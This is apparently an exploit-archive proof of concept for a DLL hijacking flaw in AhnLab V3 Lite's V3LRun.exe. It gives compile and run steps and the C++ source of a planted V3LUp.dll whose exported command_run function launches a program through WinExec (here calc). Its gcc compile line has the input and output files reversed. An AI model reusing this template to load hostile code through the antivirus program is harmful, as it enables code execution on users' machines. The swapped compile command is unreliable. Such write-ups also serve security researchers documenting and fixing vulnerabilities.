/*
# Exploit Title: AhnLab V3 Lite (V3LUp.dll) Dll Hijacking Exploit
# Date: 03\8\2011
# Author: wh1ant
# Vendor or Software Link: http://v3lite.v3webhard.com/download/V3LiteSG_Setup.exe
# Version: V3 engine version: 2011.08.03.00
# Category:: local
# Tested on: windows
Tested on Microsoft Windows XP Professional SP3 (KR) and Microsoft Windows 7 Ultimate (KR)
Target program V3LRun.exe
Compile.
gcc -shared V3LUp.dll -o V3LUp.cpp
or
visual studio 2008 used
Running.
C:\Users\wh1ant>"C:\Program Files\AhnLab\V3Lite\V3LRun.exe" C:\Users\wh1ant\V3LUp.dll,command_run aaa
*/
#include <windows.h>
extern "C" __declspec(dllexport)void command_run(void);
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
extern "C" __declspec(dllexport)void command_run(void)
{
WinExec("calc", SW_SHOW);
}
